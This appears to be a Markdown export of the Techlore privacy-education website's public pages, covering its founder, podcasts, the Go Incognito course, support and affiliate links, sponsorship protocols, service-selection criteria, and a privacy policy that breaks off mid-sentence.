# Techlore > Someone's been making decisions about your digital life without asking. Techlore is your home for taking back your privacy, security, and digital rights. Public Ghost content for AI and LLM tooling. This file includes a bounded export of public pages first, then recent public posts. Append `.md` to any post or page URL to get the content in Markdown (for example, `/example-post.md`). ## Pages ### About Techlore URL: https://techlore.tech/about/ Last updated: 2026-07-21T19:17:41.000Z ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/07/henry-cover.jpg) ## About Techlore They didn't take your choice. They made sure you ****never had one.** **Everyone's got a snoop.** For some of you it's an advertiser. For some it's your internet provider. For some it's a government. For some it's someone who's decided your phone is their business. An ad that knew too much. Your car quietly raising your insurance. A stranger who knows where you'll be. None of it felt like a choice, because it wasn't. Techlore exists to put you back in the driver's seat of your digital life, so you can finally choose for yourself. ## Meet Henry Fisher ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/07/IMG_9038-crop-1.jpg) I used to be all-in on big tech: Google everything, Snapchat with friends, never once thinking about my relationship with technology. Then over 10 years ago, I started learning how the surveillance economy worked: the data harvesting, the recklessness of the companies and governments holding my life in their hands. So I set out to take it back, and I documented every step on Techlore as I went. I went all the way. I cut down to under 30 digital accounts, moved to a nearly 100% open-source stack, and even gave up my phone entirely. But the extreme came at a real cost to convenience, to relationships, and isn't practical for most people. Having lived on both ends of the spectrum, I learned what's worth doing and what isn't. That's what I do now: put you back in the driver's seat of your digital life—without turning it into a second job. **That's Techlore: videos, podcasts, courses, and free tools, plus a weekly newsletter that keeps you ahead of the threats.** Where to start Join tens of millions who've already taken back control. [ ↗ 1 See it Take the SPA Quiz ](https://quiz.techlore.tech) [ ↗ 2 Close the gaps Find SPA Tools ](https://tools.techlore.tech) [ ↗ 3 Level up Take Go Incognito ](https://techlore.tech/go-incognito-course/) [ ↗ 4 Stay ahead Surveillance Report ](https://techlore.tech/#/portal/signup) For over a decade, Henry's work has appeared in [**CyberNews** UK VPN bans](https://cybernews.com/privacy/uk-vpn-ban-why-democracies-cant-police-vpns/) [**CyberNews** Location privacy](https://cybernews.com/security/social-media-privacy-location-settings/) [**Decrypt** Multi-sig](https://decrypt.co/resources/what-is-a-multi-sig-wallet-a-beginners-guide) [**TechTimes** Brave Origin](https://www.techtimes.com/articles/317922/20260606/brave-origin-browser-launches-60-compile-out-build-removes-leo-tor-wallet.htm) [**Bitcoin Magazine** Silent Payments](https://bitcoinmagazine.com/technical/bitcoins-privacy-just-got-better-with-silent-payments) [**HuffPost** VPNs & privacy](https://www.huffpost.com/entry/proton-vpn-digital-privacy-experts%5Fl%5F68cab492e4b0635bf8b6498e) ### Techlore Podcasts URL: https://techlore.tech/podcasts/ Last updated: 2026-07-21T20:02:11.000Z ## Techlore Podcasts Someone's been making decisions about your digital life without asking. Every week on Surveillance Report I break down what they did and what to do about it. On Techlore Talks, I sit down with the people fighting back. > ★★★★★ > “This is my go to podcast for weekly privacy and security updates. Great balanced coverage with practical advise and reminders about your own privacy and security.” > — **M5s2**, Apple Podcasts Review --- ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/SR-Exploration--1-.png) #### Surveillance Report ****Weekly News for Your Digital Freedom** I read the news so you don't have to. Every week I go through what actually happened in privacy, security, and digital rights—the breaches, the laws, the changes nobody announced and what it means for you. [Listen to Surveillance Report](https://techlore.ghost.io/tag/surveillance-report/) 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2025/11/TTCoverArt3-2.png) #### Techlore Talks ****Discussions With The People Fighting Back** I sit down with the people building, researching, and advocating for digital rights. Cybersecurity researchers, privacy tool developers, open-source maintainers, activists—if they're shaping how we protect ourselves online, they're on this show. [Listen to Techlore Talks](https://techlore.ghost.io/tag/techlore-talks/) 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ### Go Incognito: A Guide to Security, Privacy and Anonymity URL: https://techlore.tech/go-incognito-course/ Last updated: 2026-08-13T15:37:37.000Z > Your Best Path to Safety, Trusted by **1+ Million** ![Digital security concept with lock and technology](https://images.unsplash.com/photo-1576297185621-93ed9df5ca9a?q=80&w=1974&auto=format&fit=crop&ixlib=rb-4.1.0&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D) ### Security Master proven processes to secure your devices, accounts, finances, identity, and passwords from threat. ![Privacy protection with encrypted network connections](https://images.unsplash.com/photo-1582265214834-c02ec775947b?q=80&w=987&auto=format&fit=crop&ixlib=rb-4.1.0&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D) ### Privacy Build strong digital boundaries against invasive ads, social media tracking, doxxing, and data collection. ![Anonymous identity protection and online privacy](https://images.unsplash.com/photo-1582266255765-fa5cf1a1d501?q=80&w=2340&auto=format&fit=crop&ixlib=rb-4.1.0&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D) ### Anonymity Learn proven processes to fully anonymize your online identity and blend into any crowd, regardless of your activities. ![Inclusive learning resources for all skill levels](https://images.unsplash.com/photo-1587571065775-0d2ae0c863e0?q=80&w=1332&auto=format&fit=crop&ixlib=rb-4.1.0&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D) ### Developed for All Optimized for every age and threat model, complete with video lessons, checklists, quizzes, and resources. ![Long-term mindset development for privacy awareness](https://images.unsplash.com/photo-1617791160536-598cf32026fb?q=80&w=1964&auto=format&fit=crop&ixlib=rb-4.1.0&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D) ### Lifetime Mindset Privacy is a skill, not a checklist. Finish the course with the mindset needed to make informed decisions for life. ### 📺Watch Free Get instant access to the free course taken by 1+ million students. - Contains Ads - No Extra Resources - Basic 1080P Quality - No Progress Saving - No Q&A or Community [YouTube](https://www.youtube.com/playlist?list=PL3KeV6Ui%5F4CayDGHw64OFXEPHgXLkrtJO) [Techlore.TV](https://techlore.tv/w/p/wgYcHeu5RE8tuSztdjrS3Z) ### 🏫Watch Premium Join thousands of premium students getting guidance on advanced strategies and exclusive resources. - Uninterrupted, Ad-Free Learning - Knowledge Checks, Quizzes & Guides - Lifetime Access to Course Updates - Full 4K HD Video Quality - Official Certificate of Completion - Exclusive Community Access - Direct Q&A Support [Enroll Now! $54](https://techlore.teachable.com/p/go-incognito) Go Incognito v2 is being produced now. All premium students will be grandfathered into future versions of the project. What Students Say ## For beginners and experts alike ‹ > This is the most extensive free course on the Internet I have found! My life has radically changed in ways I cannot even comprehend. You are literally changing the planet. 🎉 @MEOWSKI\_2 YouTube > This course is definitely a 'must view,' IMHO, and it's something you can come back to again and again for a refresher. Excellent work! @KEITHP6689 YouTube > Thank you for sharing this course! You make privacy resonate with everyone. Different limits are okay—80% privacy is better than none. @FINNJR6365 YouTube › ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2025/11/henry-cover-2.jpeg) ## Your instructor, Henry Fisher Henry went all the way to the extreme end of privacy—under 30 accounts, a nearly 100% open-source setup, no phone at all—and came back knowing exactly what's worth doing and what isn't. For over a decade he's helped tens of millions take back control of their digital lives. Go Incognito is that decade, distilled into a path you can actually follow. [Learn More About Henry](https://henryfisher.tech/) # FAQ #### What is Go Incognito? ****Go Incognito is a premium course designed to teach you everything about the complex world of security, privacy, and anonymity.** Not only will you finish the course understanding how to protect yourself, but you’ll gain the mindset necessary to make informed decisions for the rest of your life. #### What is included? Go Incognito contains ****7 sections with a total of 54 video lessons**. To ensure concepts stick, premium lessons include quizzes to test what you’ve learned. For the more complex lessons, you'll receive supplemental materials: - Resources, guides, and checklists to further assist you. - An official certificate upon completion. - A community & direct access to Henry to support you #### What is V2? Go Incognito is designed to be an ****on-going project for life**. We are currently producing an update (v2), which all current premium students will be ****auto-enrolled in for free**. Your Go Incognito purchase is one we want to honor for life for all future iterations of the project. #### Where can I watch Go Incognito? Go Incognito can be viewed from most web browsers, via the ****Thinkific app**, or it can be viewed offline on any device if a student opts to download lessons in advance. #### Do you offer discounts? Yes, we offer several ways to access the course at a lower rate: - ****Students & Faculty:** Purchase the course for ****50% off**. [Contact us](https://techlore.tech/contact/) with your `.edu` email and we'll respond with a single-use code. - ****Cryptocurrency:** If you purchase Go Incognito with Monero (XMR), the price is discounted to ****$40**, check the next FAQ for instructions. - ****Free Variant:** Go Incognito has a free variant for public viewing with the same vital information, as we believe information should be accessible to all. #### How do I pay with Cryptocurrency? We currently accept ****Monero (XMR)**. Students who purchase Go Incognito with Monero also get a discounted rate at ****$40**. To proceed, follow these instructions: 1. ****Send $40 worth of XMR** to our wallet: `84JiPVySCmtbxHXxzmzEUjYrANpC4s93kUyeQ5B7pkB8HPgFwZHRd1f9j1WEKgZmrsTTS6ESWxWnUQ2HR8VS3e3X494eigB` 2. [****Contact Us**](https://techlore.tech/contact/) with the following information: - Express that you purchased Go Incognito with Monero. - Provide the email address you would like to have enrolled in the course. - Send the the ****transaction ID**, so we can verify your payment. 1. Once verified, we will enroll you into the course and you will receive an email to create your account and gain access. #### What's the difference between free and premium? You may have noticed there is a free variant of Go Incognito. Premium includes the following improvements: - ****Uninterrupted, Ad-Free Learning** - ****Knowledge Checks, Quizzes, & Deep-Dive Guides** - ****Lifetime Access to All Course Updates** - ****Full 4K HD Video Quality** - ****Official Certificate of Completion** - ****Exclusive Community Access** - ****Direct Q&A Support** from your instructor, Henry. - ****Polished experience in a dedicated portal** to access and track progress from a single place. - Last but not least, you’re ****helping support our mission!** Most of our work is freely available to the public and is funded by amazing supporters like you ❤️ ### How to Follow Techlore (Your Way) URL: https://techlore.tech/follow-techlore/ Last updated: 2026-07-18T19:10:18.000Z ## YouTube & Socials | Platform | Description | | --------------------------------------------------------- | ---------------------------------------------- | | [YouTube](https://youtube.com/@techlore) | Our latest content on our largest platform. | | [Techlore.TV](https://techlore.tv) | Our open source platform running on PeerTube. | | [X/Twitter](https://x.com/techloreinc) | Daily updates and quick news summaries. | | [Mastodon](https://social.lol/@techlore) | Our official decentralized social network hub. | | [Bluesky](https://bsky.app/profile/techlore.tech) | Alternative social platform updates. | | [LinkedIn](https://www.linkedin.com/company/techloreinc/) | Professional updates and organizational news. | ## Surveillance Report I read the news so you don't have to. Every week: what matters in privacy, security, and digital rights—and what to do about it. Free, five minutes. Newsletter, podcast, and video. ## Sign up for Surveillance Report Newsletter Own your digital life Subscribe Email sent! Check your inbox to complete your signup. No spam. Unsubscribe anytime. ## Podcast Feeds #### **Surveillance Report** 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), or any [podcast app](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) #### **Techlore Talks** 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## RSS Feeds Don't know what RSS is? It's a simple way to follow your favorite websites. No algorithm, no ads, just your content. Add any of these URLs to your RSS reader (like Feedly, NetNewsWire, Reeder, or Thunderbird) and get instant notifications when new content is published. 💡 ****Pro Tip:** Add ****/rss** to the end of any URL on this website. | URL | Description | | ------------------------------------------ | ----------------------------------------------------------- | | techlore.tech/rss/ | Follow everything we publish (videos, podcasts, blog posts) | | techlore.tech/tag/surveillance-report/rss/ | Surveillance Report weekly news | | techlore.tech/tag/videos/rss/ | Techlore video content only | | techlore.tech/tag/blog/rss/ | Techlore blog posts only | | techlore.tech/tag/techlore-talks/rss/ | New Techlore Talks episodes | ### Contact Techlore URL: https://techlore.tech/contact/ Last updated: 2026-07-26T05:27:44.000Z ## Reach Out For - **Service & Membership Support:** Questions regarding accounts, billing, feature access, or reporting outages and technical issues. - **Purchases & Discounts:** Inquire about purchasing [Go Incognito](https://techlore.tech/go-incognito-course/), including cryptocurrency/student discounts. - **Business Inquiries:** Discuss sponsorships, advertising, partnerships, or collaborations. Please read our [protocols](https://techlore.tech/techlore-protocols/). - **General Feedback:** Share suggestions or ideas about our content and services. - **Legitimate Security Findings:** We care *a lot* about keeping our audience safe. So if you find a security issue, please let us know **after** reading our [security policy](https://techlore.tech/security/). ## Non-Response Policy As a small team of two, we have limited resources and focus primarily on public-facing content and resources. Therefore, **we do not respond** to the following types of inquiries: - **Individualized Tech Advice:** Questions like *"Should I use XYZ?"* or specific setup requests. - **Spam or Unsolicited Mail.** [Feedback Form](https://techlore.palform.app/community-input) [Contact Email](mailto:contact@techlore.tech) ### Support Techlore URL: https://techlore.tech/support/ Last updated: 2026-09-02T17:15:52.000Z 💛 ****Sending love to our Gold & Diamond Techlorians:** Baboo, Nicolas, macinKlotz, Filip, Raymond, Pilgrim, Wolfman500, SSK, Clark, JohnnyO ## Why We Need You? 🤝 **Techlore’s independence depends on countless supporters like you. Your support allows us to:** - Sustain high-quality analysis and research. - Stay independent and accountable to you. - Continue expanding our work to reach more people. - Help cover our ongoing costs, including hosting services like PeerTube, Plexus and this website. They're not free! - Directly fund the work of our small, two-person team and ensure we earn a living wage. [ Free support ](#free-support) [ Paid support ](#paid-support) ## Free Support Methods 💚 You can support Techlore's mission for digital freedom in powerful ways that cost nothing: - **Engage and Follow:** Keep up with all of our content to ensure the content remains visible and active. [Pick your method of following us here.](https://techlore.tech/follow-techlore/) - **Share the Mission:** The best way we grow is you telling a friend. Good friends don't let friends get taken advantage of online. - **Shop With Our Friends:** Already buying a VPN or password manager? Use our links and we earn a small cut at no extra cost—same price, just supports our work. [Shop Our Friends, Support TechloreExplore Techlore’s affiliate partners. Safeguard your digital life while directly supporting our independent mission.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/size/w1200/2025/12/photo-1607082348824-0a96f2a4b9da.jpeg)](https://techlore.tech/friends/) --- ## Paid Support Methods ⭐ ### 1\. Become a Techlorian (Recommended) ****Ready to join the mission?** Become a ****Techlorian** today! Your support is the engine that funds all our content, guides, and the ongoing fight for digital rights. [Become a Techlorian ](#/portal/signup) [Become a Techlorian with Monero](https://techlore.palform.app/monero) [Send a One-Time Tip](https://techlore.tech/#/portal/support) ### 2\. Go Incognito Premium Purchase (or gift!) [Go Incognito Premium](https://techlore.tech/go-incognito-course/) for **lifetime access to our course**. [Go Incognito: A Guide to Security, Privacy and AnonymityTechlore’s premium course that teaches you how to be secure, private, and anonymous in today’s connected world.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-21.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/gi-1-1.png)](https://techlore.tech/go-incognito-course/) ### 3\. Monero ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/Screenshot-2026-08-13-at-08.11.27.png) #### Wallet Addresses for Tips - ****Wallet Address:** `84JiPVySCmtbxHXxzmzEUjYrANpC4s93kUyeQ5B7pkB8HPgFwZHRd1f9j1WEKgZmrsTTS6ESWxWnUQ2HR8VS3e3X494eigB` - ****XMR OpenAlias/Domain:** `crypto@techlore.tech` | `techlore.xmr` - ****Monero Memberships:** We now allow you to become a Techlorian at an additional discount for our 12 month plans. Just submit this [form](https://techlore.palform.app/monero) to get started. ### 4\. Sponsor Become a sponsor of Techlore and [showcase your brand](https://techlore.tech/contact/) to our audience. ### 5\. Other We offer these additional ways to support us: [YouTube Memberships](https://www.youtube.com/channel/UCs6KfncB4OV6Vug4o%5Fbzijg/join) [GitHub Sponsors](https://github.com/sponsors/techlore) [PayPal](https://www.paypal.com/donate?hosted%5Fbutton%5Fid=B3GU7WNGBGQ4J) ### Shop Our Friends, Support Techlore URL: https://techlore.tech/friends/ Last updated: 2026-08-15T02:39:52.000Z ⭐ Simply click an ⭐️ link from one of our friends before purchasing a service to support Techlore. These are always utilized under our [****strict requirements** ](https://techlore.ghost.io/techlore-protocols/)for transparency. ## Privacy & Security Tools 🔒 - **⭐️** [**1Password**](https://www.tkqlhce.com/click-100370169-15734885) – Password Manager ([Direct Link](https://1password.com/)) - **⭐️** [**Coincards**](https://coincards.com/us/?ref=techlore) – Private Cards ([Direct Link](https://coincards.com/)) - **⭐️** [**Fairphone**](https://amzn.to/3NdeHgE) – Custom ROMs (Not US) ([Direct Link](https://www.fairphone.com/)) - **⭐️** [**Google Pixel**](https://amzn.to/3pfMWw3) – Custom ROMs ([Direct Link](https://store.google.com/)) - **⭐️** [**NextDNS**](https://nextdns.io/?from=5v4be7mt) – DNS Firewall ([Direct Link](https://nextdns.io/)) - **⭐️** [**OrangeWebsite**](https://affiliate.orangewebsite.com/idevaffiliate.php?id=10799) – Web Host & VPS ([Direct Link](https://www.orangewebsite.com/)) - **⭐️** [**Privacy.com**](https://app.privacy.com/join/WYZ3N) – Card Aliasing (US only) ([Direct Link](https://privacy.com/)) - **⭐️** [**Proton Mail**](https://go.getproton.me/SH12O) – E2EE Email ([Direct Link](https://proton.me/mail)) - **⭐️** [**Proton VPN**](https://go.getproton.me/SH1Ip) – VPN Provider ([Direct Link](https://protonvpn.com/)) - **⭐️** [**Proton Pass**](https://go.getproton.me/SH1Iq) – Password Manager ([Direct Link](https://proton.me/pass)) - **⭐️** [**Proton Drive**](https://go.getproton.me/SH12Q) – Cloud Storage ([Direct Link](https://proton.me/drive)) - **⭐️** [**Trocador**](https://trocador.app/?ref=mAYSNv9jBG) – Crypto Swaps ([Direct Link](https://trocador.app/)) - **⭐️** [**Router**](https://amzn.to/43f482O) – OpenWRT Compatible ([Direct Link](https://support.linksys.com/kb/article/504-en/)) - **⭐️** [**Safe**](https://amzn.to/3Ogsipt) – Home Security ([Direct Link](https://www.sentrysafe.com/fire-waterproof-safes)) - **⭐️** [**Screen Protectors**](https://amzn.to/3NFAv6i) – Privacy Protectors ([Direct Link](https://www.supershieldz.com/)) - **⭐️** [**Shredder**](https://amzn.to/3XPkQot) – Home Security ([Direct Link](https://auroradirectstore.com/aurora-au1285md-compact-desktop-style-high-security-12-sheet-micro-cut-paper-and-cd-credit-card-junk-mail-pullout-basket-shredder-white-black/)) - **⭐️** [**SimpleLogin**](https://simplelogin.io/?slref=techlore%3E) – Email Aliasing ([Direct Link](https://simplelogin.io/)) - **⭐️** [**StartMail**](https://www.startmail.com/en/partner/?ref=y2m5ogz) – E2EE Email ([Direct Link](https://www.startmail.com/)) - **⭐️** [**Tuta**](https://tuta.com/?t-src=techlore) – E2EE Email ([Direct Link](https://tuta.com/)) - **⭐️** [**Webcam Covers**](https://amzn.to/3ph2wrq) – Camera Safety ([Direct Link](https://www.newegg.com/p/pl?d=webcam+cover)) - **⭐️** [**Yubikey**](https://amzn.to/3XrAm9S) – Security HW Key ([Direct Link](https://www.yubico.com/)) ## Production Tools 🛠️ - **⭐️** [**Artlist**](https://artlist.io/artlist-70446/?artlist%5Faid=techlore%5F2890) – Stock Audio ([Direct Link](https://artlist.io/)) - **⭐️** [**Davinci Resolve Studio**](https://amzn.to/42WfmJn) – Video Production ([Direct Link](https://www.blackmagicdesign.com/products/davinciresolve)) - **⭐️** [**DJI Mic 2**](https://amzn.to/3Bk0FrI) – Lav Mic ([Direct Link](https://www.dji.com/mic-2)) - **⭐️** [**Shure MV6**](https://amzn.to/44dylTi) — Desk Mic ([Direct Link](https://www.shure.com/en-US/products/microphones/mv6)) - **⭐️** [**Fujifilm X100V**](https://amzn.to/49sMVYr) – DSLR Camera ([Direct Link](https://fujifilm-x.com/en-us/products/cameras/x100v/)) - **⭐️** [**Hetzner**](https://hetzner.cloud/?ref=V5WPDBhWKcVF) – Server Hosting + Storage Box ([Direct Link](https://www.hetzner.com/)) - **⭐️** [**omg.lol**](https://home.omg.lol/referred-by/techlore) – Personal Site & Mastodon ([Direct Link](https://home.omg.lol/)) - **⭐️** [**Parallels**](https://prf.hn/l/pmnNkkJ) – OS Virtualization ([Direct Link](https://www.parallels.com/)) - **⭐️** [**Sennheiser HD600**](https://amzn.to/3NKvr0A) – Editing Headphones ([Direct Link](https://www.sennheiser-hearing.com/en-US/p/hd-600/)) - **⭐️** [**Sennheiser Momentum 4**](https://amzn.to/3VnIAQf) – Casual Headphones ([Direct Link](https://www.sennheiser-hearing.com/en-US/p/momentum-4-wireless/)) - **⭐️** [**Synology NAS**](https://amzn.to/3qYYuo3) – Collaboration & Files ([Direct Link](https://www.synology.com/en-us/products/DS923+)) - **⭐️** [**TubeBuddy**](https://www.tubebuddy.com/pricing?a=techlore) – Channel Management ([Direct Link](https://www.tubebuddy.com/)) ### Sponsor & Affiliate Protocols URL: https://techlore.tech/techlore-protocols/ Last updated: 2026-07-18T19:22:14.000Z **We're fortunate to have a healthy mix of funding:** community support through memberships, paid products like Go Incognito, YouTube ad revenue, sponsorships, and affiliate partnerships. **Community support is the backbone of our independence**—it's recurring, unrestricted funding that allows us to take risks, invest in new projects, and say no to partnerships that don't align with our values. **If you value what we do,** [**supporting us directly**](https://techlore.tech/about/#/portal/signup) **is the single most impactful way to help.** We also partner with sponsors and affiliates to sustainably scale our work, but these protocols exist to help ensure these partnerships don't compromise on our editorial integrity. --- ### **📕 Sponsorship Protocols** We only accept sponsors that we actively use and can personally vouch for the service/product, OR we have extensively tested and vetted it for our audience. **Put simply:** We need to genuinely believe the product has value for our audience. **When it comes to how we handle sponsors:** - Every sponsor segment is clearly labeled and timestamped so you can skip it if you want. We believe transparency means giving you control. - We hold every right to cancel sponsorships for companies that no longer align with our values. Things change, and we change with them. - Sponsors cannot influence the content we make, our recommendations, or our criticisms—whether directed at them or their competitors. No sponsor is worth losing our reputation. - If we need to criticize a current sponsor, we will do so transparently in our content. We re-evaluate all sponsor relationships regularly and will end partnerships that no longer align with our values or serve our audience. --- ### **📗 Affiliate Protocols** **Most creators hide affiliate links or don't disclose them at all.** We take a different approach: every affiliate link is clearly labeled, and we always provide a standard non-affiliate link alongside it so you choose whether to support us. We only register with services we genuinely recommend and can stand behind—even when addressing their flaws. **All affiliate links are:** - Clearly labeled as affiliate links - Opt-in (you choose to use them) - Always presented alongside standard non-affiliate links so you stay in control [You can view our affiliates here.](https://techlore.tech/shop-partners/) --- ### **📘 Review Unit Protocols** Due to our expertise, we occasionally receive review units, special access, or discounted products. We implement the following strict protocols: - **Editorial Control Guarantee:** Before accepting a unit, we require all partners to agree that we retain full, independent editorial control. We will never accept special access under conditions where we cannot independently review the product. - **Full Disclosure:** We clearly disclose to our audience if we received a product or special access. ### Techlore Criteria URL: https://techlore.tech/techlore-resources-criteria/ Last updated: 2026-07-20T07:27:55.000Z The following criteria gives visitors an idea of how we select services in our [resources.](https://tools.techlore.tech/) The criteria is not perfect, but rather designed to share what we generally look for. ## 1 - Open Source 🌐 Open source isn't everything, but it adds a large layer of transparency & oversight; open source services undergo a level of scrutiny rarely found in proprietary software. It's worth acknowledging the importance of open source varies depending on the context: For example, open source cryptography is more important than a DNS service open-sourcing their web app *(which has little to do with the privacy/security offered by the DNS provider itself)* ## 2 - Strong Privacy Protections 🕵️ This will mean different things in different contexts. Broadly, we do our best to select services that offer strong privacy protections from the service itself *(ex. Browsers that don't track their own users)* **and** that offer strong privacy protections against third parties *(ex. Browsers that prevent websites from tracking you)* ## 3 - Strong Security Protections 🔐 Similar to privacy, this will mean different things in different contexts. Broadly, we do our best to select services that offer strong security protections from the service itself *(ex. Implementing zero knowledge encryption)* **and** that offer strong security protections against third parties *(ex. Sandboxing its clients in a way that protects users)* ## 4 - Fast Security Patches 💨 Security patches are critical to keeping users secure in our ever-evolving world. We put a great deal of emphasis on them, and do our best to only recommend services that stay reasonably up-to-date with the latest threats. ## 5 - Public, Active Team 👥 We believe *(with few exceptions)* that teams behind services should be public & active. This allows users to know the history behind a service, adds accountability, and ensures there are real people dedicated to the service. Activity level is also important and speaks to the long-term sustainability of the service. We try to prioritize projects we feel have viable business models, with public & active teams who will exist in 5+ years. ## 6 - Efficient to Use 😌 Privacy & security mustn't inherently result in convenience or efficiency loss. Services which actively enable users to gain privacy & security in an efficient manner are generally prioritized. *(This can present itself as an issue in some of the following ways: difficult to install, difficult to set up, difficult to update, significant performance hit, requires certain hardware, etc.)* ## 7 - Easy to Use 👵 Similar to the previous point, privacy & security shouldn't be challenging. We generally prioritize services we feel anyone—regardless of technical knowledge—can thrive using. Even seemingly small issues can mean a lot to some users *(ex. needing to download an app from a third-party app store, or sometimes we avoid listing services due to high cost when cheaper alternatives exist)* Additionally, we prioritize services offering quality customer support in the event users need individual assistance. This *can* take the form of a helpful community, though we prefer official customer support. ## 8 - Passed the Test of Time ⏰ Services come and go. Developers come and go. Ideas come and go. We appreciate services that have a long history in prioritizing user safety. We prefer services with 3+ years of mostly positive history as a starting point for passing the test of time. One thing is announcing a new messenger, another is maintaining one for 5+ years. ## 9 - Audited & Trusted ✅ Broadly, we do our best to list services that have been formally audited—publicly, and/or have a great deal of trust within the privacy & security community. Trust is ultimately subjective and highly personal - which is why we take a broader approach to evaluating what's generally trusted by the community as a whole, in addition to analyses performed by experts. ## 10 - Evolving 📈 Lastly, we prefer services that are consistently evolving. User threats are growing in sophistication, and services that evolve with those threats are massively important to protecting users. ### Techlore Privacy Policy URL: https://techlore.tech/privacy-policy/ Last updated: 2026-09-02T23:39:08.000Z Techlore, Inc. is committed to protecting the privacy of users. Like everything we do, we've designed this policy to be simple and accessible to all. Unless otherwise indicated, it is applicable to any website that references this policy. "Service" refers to our services which can be accessed on our website at [https://techlore.tech](https://techlore.tech/), and any subdomains. The terms "we," "us," and "our" refer to Techlore, Inc. "You" refers to you, as a user of our services. ## Consent By accessing our website & Services, you accept our Privacy Policy and Terms of Use. Each time you visit our website, or use the Service, and any time you voluntarily provide us with information, you consent to our collection, use and disclosure of the information that you provide. ## Our Philosophy: We Don't Want To Know Who You Are Our goal is to collect as little information about you as possible. We don't track you, we don't sell your data, and we build our platform to respect your privacy by default. For legal clarity: We may collect both "Non-Personal Information" and "Personal Information" about you - but in practice, we collect as little as possible. Here's what that means: "Non-Personal Information" includes information that cannot be directly used to personally identify you, such as basic browser information (Ex. Firefox on Linux). This is standard on most hosting services. "Personal Information" includes information that can be used to personally identify you, such as your name and email address. This is never collected unless you optionally communicate with us by email/contact form, or choose to become a paying member (see below). We don't typically verify the information supplied, so you have every ability to use aliases for memberships and when contacting us. We have several recommendations for aliasing services in our resources. ## What We Don't Do We do not utilize cookies for tracking, and we do not use third-party trackers or advertising scripts to monitor your behavior across the web, with a couple unavoidable exceptions below. We do measure basic, anonymized usage of our sites using privacy-respecting analytics that we host ourselves — described below — so we can see which content is useful to the audience. This data can't identify you or follow you across sites. - Ghost Visitor Stats: Our hosting platform (Ghost) collects basic, privacy-respecting visitor statistics (like page views) to help us understand what content is useful. This data is first-party only (not shared with third parties), anonymized, and doesn't track individual users across sessions. - Self-Hosted Analytics (Umami): On our tools and resources (such as our SPA tools, SPA quiz and VPN finder), we use Umami — a cookieless, privacy-respecting analytics tool that we run entirely on our own servers. Because it's self-hosted, this data is never sent to any third party. Umami does not set cookies and does not store your IP address: when you load a page, your IP is used only momentarily, in memory, to estimate your country and to generate an anonymous daily-rotating identifier for counting visitors, then discarded. It does not identify you, build a profile, or track you across other websites or from one day to the next. We use this only in aggregate to understand patterns and what's helpful and what to improve. **The two exceptions:** - External embedded content (like YouTube videos) may track you through their own scripts. We use privacy-enhanced embed modes where available, but if this concerns you, we recommend using browser tools to block trackers or disabling JavaScript (though this may break some site features). - Podia's (learn.techlore.tech) checkout page loads a script from PayPal (pptm.js). We asked Podia whether this could be disabled and were told it cannot. It appears on the checkout page only, not inside the course itself, and any content blocker will stop it. We're documenting it here because we'd expect the same disclosure from anyone else. ## Community Memberships If you choose to become a paying member through our Ghost platform, we collect your email address to provide access and send you member content. You are welcome to use an aliased email address - we don't verify identity. Payment processing is handled by Stripe, which has its own privacy policy. If you enroll in our courses (hosted on Podia at learn.techlore.tech), 